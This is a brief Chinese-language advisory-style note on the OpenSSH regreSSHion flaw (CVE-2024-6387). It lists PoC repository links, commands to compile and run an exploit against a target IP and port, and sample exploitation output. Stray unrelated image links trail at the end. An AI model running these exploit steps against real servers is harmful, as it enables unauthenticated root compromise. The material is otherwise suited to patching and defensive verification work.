0x01、漏洞名稱
OpenSSH遠程代碼執行漏洞 (CVE-2024-6387)
0x02、漏洞簡介
? OpenSSH是SSH(Secure SHell)協議的開源實現,它通過不安全的網絡在兩個不受信任的主機之間提供安全的加密通信。OpenSSH 廣泛用于基于Unix 的系統,通常用于安全遠程登錄和遠程文件傳輸,以及其它網絡服務。OpenSSH 遠程代碼執行漏洞(CVE-2024-6387),該漏洞是由于OpenSSH服務器 (sshd) 中的信號處理程序競爭問題,未經身份驗證的攻擊者可以利用此漏洞在Linux系統上以root身份執行任意代碼。
受影響版本:8.5p1 <= OpenSSH < 9.8p1
0x03、漏洞利用poc
https://github.com/zgzhang/cve-2024-6387-poc
https://github.com/acrono/cve-2024-6387-poc
https://github.com/lflare/cve-2024-6387-poc
0x04、漏洞驗證
將poc編譯成可執行文件
gcc -o exploit 7etsuo-regreSSHion.c
對目標進行驗證
./exploit ip 端口
./exploit 192.168.24.139 22
返回結果
Attempting exploitation with glibc base: 0xb7200000
Attempt 0 of 20000
Received SSH version: SSH-2.0-OpenSSH_8.2p1 Debian-4
Received KEX_INIT (1024 bytes)
send_packet: Connection reset by peer
)
)
![[C++11] 退出清理函數(quick_exit at_quick_exit)](http://pic.xiahunao.cn/[C++11] 退出清理函數(quick_exit at_quick_exit))
![[今日一水]論壇該如何選擇](http://pic.xiahunao.cn/[今日一水]論壇該如何選擇)
)
)
